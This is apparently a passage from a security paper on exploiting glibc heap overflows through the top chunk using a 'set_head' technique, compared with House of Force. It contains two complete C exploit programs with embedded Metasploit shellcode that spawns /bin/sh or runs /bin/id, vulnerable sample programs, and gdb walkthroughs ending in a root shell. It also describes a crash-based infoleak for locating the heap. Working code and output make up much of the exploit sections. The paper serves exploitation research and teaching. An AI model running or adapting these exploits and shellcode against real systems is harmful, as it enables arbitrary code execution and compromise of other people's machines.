+By giving this function your return location, your return address and your
+top chunk location, it will compute the exact malloc size and top chunk
+size to use in your exploit.  It will also tell you if it's possible to
+execute the requested write operation based on the return address and the
+return location you have chosen.
+
+
+--[ 4 - Limitations
+
+At the time of writing this paper, there was no simple and easy way to
+exploit a heap overflow when the top chunk is involved.  Each exploitation
+technique needs a particular context to work successfully.  The set_head
+technique is no different.  It has some requirements to work properly.
+
+Also, it's not a real "write 4 arbitrary bytes to anywhere" primitive.  In
+fact, it would be more of a "write almost 4 arbitrary bytes to almost
+anywhere in memory" primitive.
+
+
+----[ 4.1 - Requirements of two different techniques
+
+Specific elements need to be present to exploit a situation in which the
+wilderness chunk is involved.  These elements tend to impose a lot of
+constraints when trying to exploit a program.  Below, the requirements for
+the set_head technique are listed, alongside those of the "House of Force"
+technique. As you will see, each technique has its pros and cons.
+
+
+------[ 4.1.1 - The set_head() technique
+
+Minimum requirements:
+
+        1. The size field of the topchunk needs to be overwritten with a
+           value that the attacker can control;
+
+        2. Then, there is a call to malloc with a parameter that the
+           attacker can control;
+
+This technique will let you write almost 4 arbitrary bytes to almost
+anywhere.
+
+
+------[ 4.1.2 The "House of Force" technique
+
+Minimum requirements:
+
+        1. The size field of the topchunk must be overwritten with a very
+           large value;
+
+        2. Then, there must be a first call to malloc with a very large
+           size.  An important point is that this same allocated buffer
+           should only be freed after the third step.
+
+        3. Finally, there should be a second call to malloc.  This buffer
+           should then be filled with some user supplied data.
+
+This technique will, in the best-case scenario, let you overwrite any
+region in memory with a string of an arbitrary length that you control.
+
+
+----[ 4.2 - Almost 4 bytes to almost anywhere technique
+
+This set_head technique is not really a "write 4 arbitrary bytes anywhere
+in memory" primitive.  There are some restrictions in malloc.c that greatly
+limit the possible values an attacker can use for the return location and
+the return address in an exploit.  Still, it's possible to run arbitrary
+code if you carefully choose your values.
+
+Below you will find the three main restrictions of this technique:
+
+
+------[ 4.2.1 - Everything in life is a multiple of 8
+
+A disadvantage of the set_head technique is the presence of macros that
+ensure memory locations and values are a multiple of 8 bytes.  These macros
+are:
+
+    - checked_request2size() and
+    - chunksize()
+
+Ultimately, this will have some influence on the selection of the return
+location and the return address.
+
+The memory addresses that you can overwrite with the set_head technique
+need to be aligned on a 8 bytes boundary.  Interesting locations to
+overwrite on the stack usually include a saved EIP of a stack frame or a
+function pointer. These pointers are aligned on a 4 bytes boundary, so with
+this technique, you will be able to modify one memory address on two.
+
+The return address will also need to be a multiple of 8 (not counting the
+logical OR with PREV_INUSE).  Normally, the attacker has the possibility of
+providing a NOP cushion right before his shellcode, so this is not really a
+big issue.
+
+
+------[ 4.2.2 - Top chunk's size needs to be bigger than the requested
+                malloc size
+
+This is the main disadvantage of the set_head technique.  For the top chunk
+code to be triggered and serve the memory request, there is a verification
+before the top chunk code is executed:
+
+        --[ From malloc.c
+
+        if ((unsigned long)(size) >= (unsigned long)(nb + MINSIZE)) {
+
+In short, this line requires that the size of the top chunk is bigger than
+the size requested by the malloc call.  Since the variable 'size' and 'nb'
+are computed from the return location, the return address and the top
+chunk's location, it will greatly limit the content and the location of the
+arbitrary overwrite operation.  There is still a valid combination of a
+return address and a return location that exists.
+
+Let's see what the value of 'size' and 'nb' for a given return location and
+return address will be.  Let's find out when there is a situation in which
+'size' is greater than 'nb'.  Consider the fact that the location of the
+top chunk is static and it's at 0x080614f8:
+
+        +------------+------------++------------+------------+
+        |   return   |   return   ||    size    |     nb     |
+        |  location  |   address  ||            |            |
+        +------------+------------++------------+------------+
+        | 0x0804b150 | 0x08061000 ||  134523993 | 4294876240 |
+        | 0x0804b150 | 0xbffffbaa || 3221133059 | 4294876240 |
+        | 0xbffffaaa | 0xbffffbaa || 2012864861 | 3086607786 |
+        | 0xbffffaaa | 0x08061000 || 3221222835 | 3086607786 | <- !!!!!
+        +------------+------------++------------+------------+
+
+As you can see from this chart, the only time that you get a situation
+where 'size' is greater than 'nb' is when your return location is somewhere
+in the stack and when your return address is somewhere in the heap.
+
+
+------[ 4.2.3 - Logical OR with PREV_INUSE
+
+When the set_head macro is called, 'remainder_size', which is the return
+address, will be altered by a logical OR with the flag PREV_INUSE:
+
+        --[ From malloc.c
+
+        #define PREV_INUSE 0x1
+
+        set_head(remainder, remainder_size | PREV_INUSE);
+
+It was said in section 4.2.1 that the return address will always be a
+multiple of 8 bytes due to the normalisation of some macros.  With the
+PREV_INUSE logical OR, it will be a multiple of 8 bytes, plus 1.  With an
+NOP cushion, this problem is solved.  Compared to the previous two, this
+restriction is a very small one.
+
+
+--[ 5 - Taking set_head() to the next level
+
+As a general rule, hackers try to make their exploit as reliable as
+possible.  Exploiting a vulnerability in a confined lab and in the wild are
+two different things.  This section will try to present some techniques to
+improve the reliability of the set_head technique.
+
+
+----[ 5.1 - Multiple overwrites
+
+One way to make the exploitation process a lot more reliable is by using
+multiple overwrites.  Indeed, having the possibility of overwriting a
+memory location with 4 bytes is good, but the possibility to write multiple
+times to memory is even better[8].  Being able to overwrite multiple memory
+locations with set_head will increase your chance of finding a valid return
+location on the stack.
+
+A great advantage of the set_head technique is that it does not corrupt
+internal malloc information in a way that prevents the program from working
+properly.  This advantage will let you safely overwrite more than one
+memory location.
+
+To correctly put this technique in place, the attacker will need to start
+overwriting addresses at the top of the stack, and go downward until he
+seizes control of the program.  Here are the possible addresses that
+set_head() lets you overwrite on the stack:
+
+        1: 0xbffffffc
+        2: 0xbffffff4
+        3: 0xbfffffec
+        4: 0xbfffffe4
+        5: 0xbfffffdc
+        6: 0xbfffffd4
+        7: 0xbfffffcc
+        8: 0xbfffffc4
+        9: ...
+
+Eventually, the attacker will fall on a memory location which is a saved
+EIP in a stack frame.  If he's lucky enough, this new saved EIP will be
+popped in the EIP register.
+
+Remember that for a successfull overwrite, the attacker needs to do two
+things:
+
+        1. Overwrite the top chunk with a specific value;
+        2. Make a call to malloc with a specific value.
+
+Based on the formulas that were found in section 3.3, let's compute the
+values for the top chunk size and the size for the malloc call for each
+overwrite operation.  Let's take the following values for an example case:
+
+        The location of the top chunk:        0x08050100
+        The return address:                   0x08050200
+        The return location:                  Decrementing from 0xbffffffc
+                                              to 0xbfffffc4
+
+         +------------++------------+------------+
+         |   return   || top chunk  |   malloc   |
+         |  location  ||   size     |    size    |
+         +------------++------------+------------+
+         +------------++------------+------------+
+         | 0xbffffffc || 3221225725 | 3086679796 |
+         | 0xbffffff4 || 3221225717 | 3086679788 |
+         | 0xbfffffec || 3221225709 | 3086679780 |
+         | 0xbfffffe4 || 3221225701 | 3086679772 |
+         | 0xbfffffdc || 3221225693 | 3086679764 |
+         | 0xbfffffd4 || 3221225685 | 3086679756 |
+         | 0xbfffffcc || 3221225677 | 3086679748 |
+         | 0xbfffffc4 || 3221225669 | 3086679740 |
+         |     ...    ||     ...    |     ...    |
+         +------------++------------+------------+
+
+By looking at this chart, you can determine that for each overwrite
+operation, the attacker would need to overwrite the size of the top chunk
+with a new value and make a call to malloc with an arbitrary value.  Would
+it be possible to improve this a little bit?  It would be great if the only
+thing you needed to change between each overwrite operation was the size of
+the malloc call, leaving the size of the top chunk untouched.
+
+Indeed, it's possible.  Look closely at the functions used to compute
+malloc_size and topchunk_size.  Let's say the attacker has only one
+possibility to overwrite the size of the top chunk, would it still be
+possible to do multiple overwrites using the set_head technique while
+keeping the same size for the top chunk?
+
+        1. malloc_size = (retloc - toploc - 8)
+        2. topchunk_size = (retadr + malloc_size + 8) | PREV_INUSE
+
+If you look at how 'topchunk_size' is computed, it seems possible.  By
+changing the value of 'retloc', it will affect 'malloc_size'. Then,
+'malloc_size' is used to compute 'topchunk_size'.  By playing with 'retadr'
+in the second formula, you can always hit the same 'topchunk_size'.  Let's
+look at the same example, but this time with a changing return address.
+While the return location is decrementing by 8, let's increment the return
+address by 8.
+
+
+        +------------+-----------++------------+------------+
+        |   return   |  return   || top chunk  |   malloc   |
+        |  location  |  address  ||   size     |    size    |
+        +------------+-----------++------------+------------+
+        +------------+-----------++------------+------------+
+        | 0xbffffffc | 0x8050200 || 3221225725 | 3086679796 |
+        | 0xbffffff4 | 0x8050208 || 3221225725 | 3086679788 |
+        | 0xbfffffec | 0x8050210 || 3221225725 | 3086679780 |
+        | 0xbfffffe4 | 0x8050218 || 3221225725 | 3086679772 |
+        | 0xbfffffdc | 0x8050220 || 3221225725 | 3086679764 |
+        | 0xbfffffd4 | 0x8050228 || 3221225725 | 3086679756 |
+        | 0xbfffffcc | 0x8050230 || 3221225725 | 3086679748 |
+        | 0xbfffffc4 | 0x8050238 || 3221225725 | 3086679740 |
+        |    ...     |    ...    ||     ...    |     ...    |
+        +------------+-----------++------------+------------+
+
+You can see that the size of the top chunk is always the same.  On the
+other hand, the return address changes through the multiple overwrites.
+The attacker needs to have an NOP cushion big enough to adapt to this
+variation.
+
+Refer to section 6.1.2.1 to get a sample vulnerable scenario exploitable
+with multiple overwrites.
+
+
+----[ 5.2 - Infoleak
+
+As was stated in the Shellcoder's Handbook[9]: "An information leak can
+make even a difficult bug possible".  Most of the time, people who write
+exploits try to make them as reliable as possible.  If hackers, using an
+infoleak technique, can improve the reliability of the set_head technique,
+well, that's pretty good.  The technique is already hard to use because it
+relies on unknown memory locations, which are:
+
+        - The return location
+        - The top chunk location
+        - The return address
+
+When there is an overwrite operation, if the attacker is able to tell if
+the program has crashed or not, he can turn this to his advantage.  Indeed,
+this knowledge could help him find one parameter of the exploitable
+situation, which is the top chunk location.
+
+The theory behind this technique is simple.  If the attacker has the real
+address of the top chunk, he will be able to write at the address
+0xbffffffc but not at the address 0xc0000004.
+
+Indeed, a write operation at the address 0xbffffffc will work because this
+address is in the stack and its purpose is to store the environment
+variables of the program.  It does not significantly affect the behaviour
+of the program, so the program will still continue to run normally.
+
+On the other hand, if the attacker wrote in memory starting from
+0xc0000000, there will be a segmentation fault because this memory region
+is not mapped.  After this violation, the program will crash.
+
+To take advantage of this behaviour, the attacker will have to do a series
+of write operations while incrementing or decrementing the location of the
+top chunk.  For each top chunk location tried, there should be 6 write
+operations.
+
+Below, you will find the parameters of the exploitable situation to use
+during the 6 write operations.  The expected result is in the right column
+of the chart.  If you get these results, then the value used for the
+location of the top chunk is the right one.
+
+        +------------+------------++--------------+
+        |  return    |   return   ||    Did it    |
+        |  location  |   address  ||   segfault ? |
+        +------------+------------++--------------+
+        +------------+------------++--------------+
+        | 0xc0000014 | 0x07070707 ||     Yes      |
+        | 0xc000000c | 0x07070707 ||     Yes      |
+        | 0xc0000004 | 0x07070707 ||     Yes      |
+        | 0xbffffffc | 0x07070707 ||     No       |
+        | 0xbffffff4 | 0x07070707 ||     No       |
+        | 0xbfffffec | 0x07070707 ||     No       |
+        +------------+------------++--------------+
+
+If the six write operations made the program segfault each time, then the
+attacker is probably writing after 0xbfffffff or below the limit of the
+stack.
+
+If the 6 write operations succeeded and the program did not crash, then it
+probably means that the attacker overwrote some values in the stack.  In
+that case, decrement the value of the top chunk location to use.
+
+
+--[ 6 - Examples
+
+The best way to learn something new is probably with the help of examples.
+Below, you will find some vulnerable codes and their exploits.
+
+A scenario-based approach is taken here to demonstrate the exploitability
+of a situation.  Ultimately, the exploitability of a context can be defined
+by specific characterictics.
+
+Also, the application of the set_head() technique on a real life example is
+shown with the file(1) utility vulnerability.  The set_head technique was
+found to exploit this specific vulnerability.
+
+
+----[ 6.1 - The basic scenarios
+
+To simplify things, it's useful to define exploitable contexts in terms of
+scenarios.  For each specific scenario, there should be a specific way to
+exploit it.  Once the reader has learned those scenarios, he can then match
+them with vulnerable situations in softwares.  He will then know exactly
+what approach to use to make the most out of the vulnerability.
+
+
+------[ 6.1.1.1 - The most basic form of the set_head() technique
+
+This scenario is the most basic form of the application of the set_head()
+technique.  This is the approach that was used in the file(1) utility
+exploit.
+
+--------------------------- scenario1.c -----------------------------------
+        #include <stdio.h>
+        #include <stdlib.h>
+
+        int main (int argc, char *argv[]) {
+
+                char *buffer1;
+                char *buffer2;
+                unsigned long size;
+
+/* [1] */       buffer1 = (char *) malloc (1024);
+/* [2] */       sprintf (buffer1, argv[1]);
+
+                size = strtoul (argv[2], NULL, 10);
+
+/* [3] */       buffer2 = (char *) malloc (size);
+
+                return 0;
+        }
+--------------------------- end of scenario1.c ----------------------------
+
+Here is a brief description of the important lines in this code:
+
+[1]: The top chunk is split and a memory region of 1024 bytes is requested.
+
+[2]: A sprintf call is made.  The destination buffer is not checked to see
+     if it is large enough.  The top chunk can then be overwritten here.
+
+[3]: A call to malloc with a user-supplied size is done.
+
+
+------[ 6.1.1.2 - Exploit
+
+--------------------------- exp1.c ----------------------------------------
+/*
+   Exploit for scenario1.c
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+
+// The following #define are from malloc.c and are used
+// to compute the values for the malloc size and the top chunk size.
+#define PREV_INUSE 0x1
+#define SIZE_BITS  0x7       // PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA
+#define SIZE_SZ (sizeof(size_t))
+#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
+#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
+#define MIN_CHUNK_SIZE 16
+#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
+    & ~MALLOC_ALIGN_MASK))
+#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
+    < MINSIZE)?MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \
+    & ~MALLOC_ALIGN_MASK)
+
+
+struct sethead {
+    unsigned long topchunk_size;
+    unsigned long malloc_size;
+};
+
+
+/* linux_ia32_exec -  CMD=/bin/sh Size=68 Encoder=PexFnstenvSub
+   http://metasploit.com */
+unsigned char scode[] =
+"\x31\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27"
+"\xe2\xc0\xb3\x83\xeb\xfc\xe2\xf4\x4d\xe9\x98\x2a\x75\x84\xa8\x9e"
+"\x44\x6b\x27\xdb\x08\x91\xa8\xb3\x4f\xcd\xa2\xda\x49\x6b\x23\xe1"
+"\xcf\xea\xc0\xb3\x27\xcd\xa2\xda\x49\xcd\xb3\xdb\x27\xb5\x93\x3a"
+"\xc6\x2f\x40\xb3";
+
+
+struct sethead * set_head_compute
+    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {
+
+    unsigned long check_retloc, check_retadr;
+    struct sethead *shead;
+
+    shead = (struct sethead *) malloc (8);
+    if (shead == NULL) {
+        fprintf (stderr,
+            "--[ Could not allocate memory for sethead structure\n");
+        exit (1);
+    }
+
+    if ( (toploc % 8) != 0 ) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the top chunk location.",
+            toploc);
+
+        toploc = toploc - (toploc % 8);
+        fprintf (stderr, "  Using 0x%x instead\n", toploc);
+    } else
+        fprintf (stderr,
+            "--[ Using 0x%x as the top chunk location.\n", toploc);
+
+    // The minus 8 is to take care of the normalization
+    // of the malloc parameter
+    shead->malloc_size = (retloc - toploc - 8);
+
+    // By adding the 8, we are able to sometimes perfectly hit
+    // the return address.  To hit it perfectly, retadr must be a multiple
+    // of 8 + 1 (for the PREV_INUSE flag).
+    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;
+
+    if (shead->topchunk_size < shead->malloc_size) {
+        fprintf (stderr,
+            "--[ ERROR: topchunk size is less than malloc size.\n");
+        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
+        exit (1);
+    }
+
+    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
+    if (check_retloc != retloc) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the return location. ", retloc);
+        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
+    } else
+        fprintf (stderr, "--[ Using 0x%x as the return location.\n",
+            retloc);
+
+    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
+        - request2size (shead->malloc_size)) | PREV_INUSE;
+    if (check_retadr != retadr) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the return address.", retadr);
+        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
+    } else
+        fprintf (stderr, "--[ Using 0x%x as the return address.\n",
+            retadr);
+
+    return shead;
+}
+
+
+void
+put_byte (char *ptr, unsigned char data) {
+    *ptr = data;
+}
+
+
+void
+put_longword (char *ptr, unsigned long data) {
+    put_byte (ptr, data);
+    put_byte (ptr + 1, data >> 8);
+    put_byte (ptr + 2, data >> 16);
+    put_byte (ptr + 3, data >> 24);
+}
+
+
+int main (int argc, char *argv[]) {
+
+        char *buffer;
+        char malloc_size_string[20];
+        unsigned long retloc, retadr, toploc;
+        unsigned long topchunk_size, malloc_size;
+        struct sethead *shead;
+
+        if ( argc != 4) {
+                printf ("wrong number of arguments, exiting...\n\n");
+                printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
+                return 1;
+        }
+
+        sscanf (argv[1], "0x%x", &retloc);
+        sscanf (argv[2], "0x%x", &retadr);
+        sscanf (argv[3], "0x%x", &toploc);
+
+        shead = set_head_compute (retloc, retadr, toploc);
+        topchunk_size = shead->topchunk_size;
+        malloc_size = shead->malloc_size;
+
+        buffer = (char *) malloc (1036);
+
+        memset (buffer, 0x90, 1036);
+        put_longword (buffer+1028, topchunk_size);
+        memcpy (buffer+1028-strlen(scode), scode, strlen (scode));
+        buffer[1032]=0x0;
+
+        snprintf (malloc_size_string, 20, "%u", malloc_size);
+        execl ("./scenario1", "scenario1", buffer, malloc_size_string,
+            NULL);
+
+        return 0;
+}
+--------------------------- end of exp1.c ---------------------------------
+
+Here are the steps to find the 3 memory values to use for this exploit.
+
+
+1- The first step is to generate a core dump file from the vulnerable
+program.  You will then have to analyze this core dump to find the proper
+values for your exploit.
+
+To generate the core file, get an approximation of the top chunk location
+by getting the base address of the BSS section.  Normally, the heap will
+start just after the BSS section:
+
+bash$ readelf -S ./scenario1 | grep bss
+  [22] .bss              NOBITS          080495e4 0005e4 000004
+
+
+The BSS section starts at 0x080495e4.  Let's call the exploit the following
+way, and remember to replace 0x080495e4 for the BSS value you have found:
+
+bash$ ./exp1 0xc0c0c0c0 0x080495e4 0x080495e4
+--[ Impossible to use 0x80495e4 as the top chunk location.  Using 0x80495e0
+instead
+--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
+instead
+--[ Impossible to use 0x80495e4 as the return address. Using 0x80495e1
+instead
+Segmentation fault (core dumped)
+bash$
+
+
+2- Call gdb on that core dump file.
+
+bash$ gdb -q scenario1 core.2212
+Core was generated by `scenario1'.
+Program terminated with signal 11, Segmentation fault.
+Reading symbols from /usr/lib/debug/libc.so.6...done.
+Loaded symbols for /usr/lib/debug/libc.so.6
+Reading symbols from /lib/ld-linux.so.2...done.
+Loaded symbols for /lib/ld-linux.so.2
+#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082
+
+4082          set_head(remainder, remainder_size | PREV_INUSE);
+(gdb)
+
+
+3- The ESI register contains the address of the top chunk.  It might be
+another register for you.
+
+(gdb) info reg esi
+esi            0x8049a38        134519352
+(gdb)
+
+
+4- Start searching before the location of the top chunk to find the NOP
+cushion.  This will be the return address.
+
+0x8049970:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8049980:      0x90909090      0x90909090      0x90909090      0x90909090
+0x8049990:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80499a0:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80499b0:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80499c0:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80499d0:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80499e0:      0x90909090      0x90909090      0x90909090      0xe983c931
+0x80499f0:      0xd9eed9f5      0x5bf42474      0x27137381      0x83b3c0e2
+0x8049a00:      0xf4e2fceb      0x2a98e94d      0x9ea88475      0xdb276b44
+(gdb)
+
+0x8049990 is a valid address.
+
+
+5- To get the return location for your exploit, get a saved EIP from a
+stack frame.
+
+(gdb) frame 2
+#2  0x0804840a in main ()
+(gdb) x $ebp+4
+0xbffff52c:     0x4002980c
+(gdb)
+
+0xbffff52c is the return location.
+
+
+6- You can now call the exploit with the values that you have found.
+
+bash$ ./exp1 0xbffff52c 0x8049990 0x8049a38
+--[ Using 0x8049a38 as the top chunk location.
+--[ Using 0xbffff52c as the return location.
+--[ Impossible to use 0x8049990 as the return address. Using 0x8049991
+instead
+sh-2.05b# exit
+exit
+bash$
+
+
+------[ 6.1.2.1 - Multiple overwrites
+
+This scenario is an example of a situation where it could be possible to
+leverage the set_head() technique to make it write multiple times in
+memory.  Applying this technique will help you improve the reliability of
+the exploit.  It will increase your chances of finding a valid return
+location while you are exploiting the program.
+
+--------------------------- scenario2.c -----------------------------------
+        #include <stdio.h>
+        #include <stdlib.h>
+        #include <unistd.h>
+
+        int main (int argc, char *argv[]) {
+
+                char *buffer1;
+                char *buffer2;
+                unsigned long size;
+
+/* [1] */       buffer1 = (char *) malloc (4096);
+/* [2] */       fgets (buffer1, 4200, stdin);
+
+/* [3] */       do {
+                        size = 0;
+                        scanf ("%u", &size);
+/* [4] */               buffer2 = (char *) malloc (size);
+
+                        /*
+                         * Random code
+                         */
+
+/* [5] */               free (buffer2);
+
+                } while (size != 0);
+
+                return 0;
+        }
+------------------------- end of scenario2.c ------------------------------
+
+Here is a brief description of the important lines in this code:
+
+[1]: A memory region of 4096 bytes is requested.  The top chunk is split
+     and the request is serviced.
+
+[2]: A call to fgets is made.  The destination buffer is not checked to see
+     if it is large enough.  The top chunk can then be overwritten here.
+
+[3]: The program enters a loop.  It reads from 'stdin' until the number '0'
+     is entered.
+
+[4]: A call to malloc is done with 'size' as the parameter.  The loop does
+     not end until size equals '0'.  This gives the attacker the
+     possibility of overwriting the memory multiple times.
+
+[5]: The buffer needs to be freed at the end of the loop.
+
+
+------[ 6.1.2.2 - Exploit
+
+--------------------------- exp2.c ----------------------------------------
+/*
+   Exploit for scenario2.c
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+
+// The following #define are from malloc.c and are used
+// to compute the values for the malloc size and the top chunk size.
+#define PREV_INUSE 0x1
+#define SIZE_BITS  0x7       // PREV_INUSE|IS_MMAPPED|NON_MAIN_ARENA
+#define SIZE_SZ (sizeof(size_t))
+#define MALLOC_ALIGNMENT (2 * SIZE_SZ)
+#define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1)
+#define MIN_CHUNK_SIZE 16
+#define MINSIZE (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) \
+    & ~MALLOC_ALIGN_MASK))
+#define request2size(req) (((req) + SIZE_SZ + MALLOC_ALIGN_MASK \
+    < MINSIZE)?MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) \
+    & ~MALLOC_ALIGN_MASK)
+
+
+struct sethead {
+    unsigned long topchunk_size;
+    unsigned long malloc_size;
+};
+
+
+/* linux_ia32_exec -  CMD=/bin/id Size=68 Encoder=PexFnstenvSub
+http://metasploit.com */
+unsigned char scode[] =
+"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x4f"
+"\x3d\x1a\x3d\x83\xeb\xfc\xe2\xf4\x25\x36\x42\xa4\x1d\x5b\x72\x10"
+"\x2c\xb4\xfd\x55\x60\x4e\x72\x3d\x27\x12\x78\x54\x21\xb4\xf9\x6f"
+"\xa7\x35\x1a\x3d\x4f\x12\x78\x54\x21\x12\x73\x59\x4f\x6a\x49\xb4"
+"\xae\xf0\x9a\x3d";
+
+
+struct sethead * set_head_compute
+    (unsigned long retloc, unsigned long retadr, unsigned long toploc) {
+
+    unsigned long check_retloc, check_retadr;
+    struct sethead *shead;
+
+    shead = (struct sethead *) malloc (8);
+    if (shead == NULL) {
+        fprintf (stderr,
+            "--[ Could not allocate memory for sethead structure\n");
+        exit (1);
+    }
+
+    if ( (toploc % 8) != 0 ) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the top chunk location.",
+            toploc);
+
+        toploc = toploc - (toploc % 8);
+        fprintf (stderr, "  Using 0x%x instead\n", toploc);
+    } else
+        fprintf (stderr,
+            "--[ Using 0x%x as the top chunk location.\n", toploc);
+
+    // The minus 8 is to take care of the normalization
+    // of the malloc parameter
+    shead->malloc_size = (retloc - toploc - 8);
+
+    // By adding the 8, we are able to sometimes perfectly hit
+    // the return address.  To hit it perfectly, retadr must be a multiple
+    // of 8 + 1 (for the PREV_INUSE flag).
+    shead->topchunk_size = (retadr + shead->malloc_size + 8) | PREV_INUSE;
+
+    if (shead->topchunk_size < shead->malloc_size) {
+        fprintf (stderr,
+            "--[ ERROR: topchunk size is less than malloc size.\n");
+        fprintf (stderr, "--[ Topchunk code will not be triggered\n");
+        exit (1);
+    }
+
+    check_retloc = (toploc + request2size (shead->malloc_size) + 4);
+    if (check_retloc != retloc) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the return location. ", retloc);
+        fprintf (stderr, "Using 0x%x instead\n", check_retloc);
+    } else
+        fprintf (stderr, "--[ Using 0x%x as the return location.\n",
+            retloc);
+
+    check_retadr = ( (shead->topchunk_size & ~(SIZE_BITS))
+        - request2size (shead->malloc_size)) | PREV_INUSE;
+    if (check_retadr != retadr) {
+        fprintf (stderr,
+            "--[ Impossible to use 0x%x as the return address.", retadr);
+        fprintf (stderr, " Using 0x%x instead\n", check_retadr);
+    } else
+        fprintf (stderr, "--[ Using 0x%x as the return address.\n",
+            retadr);
+
+    return shead;
+}
+
+
+void
+put_byte (char *ptr, unsigned char data) {
+    *ptr = data;
+}
+
+
+void
+put_longword (char *ptr, unsigned long data) {
+    put_byte (ptr, data);
+    put_byte (ptr + 1, data >> 8);
+    put_byte (ptr + 2, data >> 16);
+    put_byte (ptr + 3, data >> 24);
+}
+
+
+int main (int argc, char *argv[]) {
+
+        char *buffer;
+        char malloc_size_buffer[20];
+        unsigned long retloc, retadr, toploc;
+        unsigned long topchunk_size, malloc_size;
+        struct sethead *shead;
+        int i;
+
+        if ( argc != 4) {
+                printf ("wrong number of arguments, exiting...\n\n");
+                printf ("%s <retloc> <retadr> <toploc>\n\n", argv[0]);
+                return 1;
+        }
+
+        sscanf (argv[1], "0x%x", &retloc);
+        sscanf (argv[2], "0x%x", &retadr);
+        sscanf (argv[3], "0x%x", &toploc);
+
+        shead = set_head_compute (retloc, retadr, toploc);
+        topchunk_size = shead->topchunk_size;
+        free (shead);
+
+        buffer = (char *) malloc (4108);
+        memset (buffer, 0x90, 4108);
+        put_longword (buffer+4100, topchunk_size);
+        memcpy (buffer+4100-strlen(scode), scode, strlen (scode));
+        buffer[4104]=0x0;
+
+        printf ("%s\n", buffer);
+
+        for (i = 0; i < 300; i++) {
+                shead = set_head_compute (retloc, retadr, toploc);
+                topchunk_size = shead->topchunk_size;
+                malloc_size = shead->malloc_size;
+
+                printf ("%u\n", malloc_size);
+
+                retloc = retloc - 8;
+                retadr = retadr + 8;
+
+                free (shead);
+        }
+
+        return 0;
+}
+--------------------------- end of exp2.c ---------------------------------
+
+Here are the steps to find the memory values to use for this exploit.
+
+
+1- The first step is to generate a core dump file from the vulnerable
+program.  You will then have to analyze this core dump to find the proper
+values for your exploit.
+
+To generate the core file, get an approximation of the top chunk location
+by getting the base address of the BSS section.  Normally, the heap will
+start just after the BSS section:
+
+bash$ readelf -S ./scenario2|grep bss
+  [22] .bss              NOBITS          0804964c 00064c 000008
+
+
+The BSS section starts at 0x0804964c.  Let's call the exploit the following
+way, and remember to replace 0x0804964c for the BSS value you have found:
+
+bash$ ./exp2 0xc0c0c0c0 0x0804964c 0x0804964c | ./scenario2
+--[ Impossible to use 0x804964c as the top chunk location.  Using 0x8049648
+instead
+--[ Impossible to use 0xc0c0c0c0 as the return location. Using 0xc0c0c0c4
+instead
+--[ Impossible to use 0x804964c as the return address. Using 0x8049649
+instead
+--[ Impossible to use 0x804964c as the top chunk location.  Using 0x8049648
+instead
+[...]
+--[ Impossible to use 0xc0c0b768 as the return location. Using 0xc0c0b76c
+instead
+--[ Impossible to use 0x8049fa4 as the return address. Using 0x8049fa1
+instead
+Segmentation fault (core dumped)
+bash#
+
+
+2- Call gdb on that core dump file.
+
+bash$ gdb -q scenario2 core.2698
+Core was generated by `./scenario2'.
+Program terminated with signal 11, Segmentation fault.
+Reading symbols from /usr/lib/debug/libc.so.6...done.
+Loaded symbols for /usr/lib/debug/libc.so.6
+Reading symbols from /lib/ld-linux.so.2...done.
+Loaded symbols for /lib/ld-linux.so.2
+#0  _int_malloc (av=0x40140860, bytes=1075054688) at malloc.c:4082
+
+4082          set_head(remainder, remainder_size | PREV_INUSE);
+(gdb)
+
+
+3- The ESI register contains the address of the top chunk.  It might be
+another register for you.
+
+(gdb) info reg esi
+esi            0x804a6a8        134522536
+(gdb)
+
+
+4- For the return address, get a memory address at the beginning of the NOP
+cushion:
+
+0x8049654:      0x00000000      0x00000000      0x00000019      0x4013e698
+0x8049664:      0x4013e698      0x400898a0      0x4013d720      0x00000000
+0x8049674:      0x00000019      0x4013e6a0      0x4013e6a0      0x400899b0
+0x8049684:      0x4013d720      0x00000000      0x00000019      0x4013e6a8
+0x8049694:      0x4013e6a8      0x40089a80      0x4013d720      0x00000000
+0x80496a4:      0x00001009      0x90909090      0x90909090      0x90909090
+0x80496b4:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80496c4:      0x90909090      0x90909090      0x90909090      0x90909090
+0x80496d4:      0x90909090      0x90909090      0x90909090      0x90909090
+
+
+0x80496b4 is a valid address.
+
+
+5- You can now call the exploit with the values that you have found.  The
+return location will be 0xbffffffc, and it will decrement with each write.
+The shellcode in exp2.c executes /bin/id.
+
